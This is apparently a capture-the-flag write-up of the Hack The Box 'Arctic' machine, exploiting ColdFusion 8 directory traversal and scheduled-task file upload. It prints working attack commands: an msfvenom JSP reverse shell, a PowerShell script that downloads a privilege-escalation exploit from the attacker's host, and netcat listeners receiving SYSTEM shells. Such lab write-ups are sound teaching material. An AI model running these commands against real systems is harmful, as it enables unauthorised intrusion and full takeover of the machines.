Let’s get started!:)
This is the initial step in order to scan the open services in the machine.
COMMAND: nmap -sC -sV -O -oA arctic 10.10.10.11
In the above nmap scan result , port 8500 looks interesting. Let’s have a look in the browser.
Let’s open CFIDE folder.
The administrator directory gives us a login for ColdFusion 8.
After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal. ColdFusion 8 also stores the administrator hash locally in a file called password.properties. So we can grab the administrator hash using the directory traversal using the following URL:
And we will get this output in the browser.
So we have a hash of
A quick Google search online yields the cracked password –
Inside of the login page there is an area that allows us to upload files via Scheduled Tasks under the Debugging & Logging Category as shown below the image.
The scheduled task setup gives you the ability to download a file from a webserver and save the output locally. Under Mappings, we can verify the CFIDE path, so we know where we can save a shell.
At this point we need to generate a shell. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution or we can get a full shell by uploading a JSP shell since ColdFusion will serve and run JSP files.
To generate a JSP shell we will use msfvenom.
COMMAND: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f raw > shell_exp1o1t9r.jsp
Now that we have our shell created let’s serve up the file from Kali using a python SimpleHTTPServer.
python -m SimpleHTTPServer 80
Inside the ColdFusion admin console we configure three parameters for the scheduled task.
- Set the URL to our webserver hosting the JSP shell
- Check the box for Save output to a file
- Set File to C:\ColdFusion8\wwwroot\CFIDE\shell_exp1o1t9r.jsp
Fire up a netcat listener and we can now browse to our shell at
BOOM! we got the shell!
Tolis is a user account and we need to escalate the privileges to administrator and get the root flag!
C:\>systeminfo systeminfo Host Name: ARCTIC OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00477-001-0000421-84900 Original Install Date: 22/3/2017, 11:09:45 System Boot Time: 29/12/2017, 3:34:21 System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 2 Processor(s) Installed. : Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz : Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 5/4/2016 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 1.024 MB Available Physical Memory: 88 MB Virtual Memory: Max Size: 2.048 MB Virtual Memory: Available: 1.085 MB Virtual Memory: In Use: 963 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. : Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) : 10.10.10.11
From here we identify the box is running Server 2008 R2 and also has no patches installed according to the output under Hotfix(s)..Let’s see what exploits we can find. From here you can either Google, use Exploit-DB, searchsploit, or for Windows I like to use something called Windows Exploit Suggester which makes life easy. I won’t go into details on how to use it, check the github to see usage and what all you can feed into it.
After looking through the output I found a few privilege escalation exploits that could work. I settled on looking into MS10-059.
The Exploit-DB download only contained source files and no compiled exe. For whatever reason the exploit has an alias name of Chimichurri as referenced on Exploit-DB so I also searched by that and was able to find a compiled exe on Github here. Note that normally you want compile things yourself but I wasn’t able to do so myself without installing a ton of stuff so I decided to forgo it. Based on the source code it looks like the exploit will send us a reverse shell by feeding our IP address and desired port as parameters.
Once again we setup a python http server on Kali and to download to our target a simple powershell script will do the trick.
C:\ColdFusion8>echo $webclient = New-Object System.Net.WebClient >>wget.ps1 C:\ColdFusion8>echo $url = "http://10.10.14.10/chimichurri.exe" >>wget.ps1 C:\ColdFusion8>echo $file = "exploit.exe" >>wget.ps1 C:\ColdFusion8>echo $webclient.DownloadFile($url,$file) >>wget.ps1 C:\ColdFusion8>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
We verify the download, start a netcat listener, and run the exploit.
C:\ColdFusion8>exploit.exe 10.10.14.30 443 /Chimichurri/-->This exploit gives you a Local System shell /Chimichurri/-->Changing registry values... /Chimichurri/-->Got SYSTEM token... /Chimichurri/-->Running reverse shell... /Chimichurri/-->Restoring default registry values...
root@exp1o1t9r:~/hacthebox/arctic# nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49267 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\ColdFusion8>whoami & hostname whoami & hostname nt authority\system arctic
From here we can get the root flag:)
If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r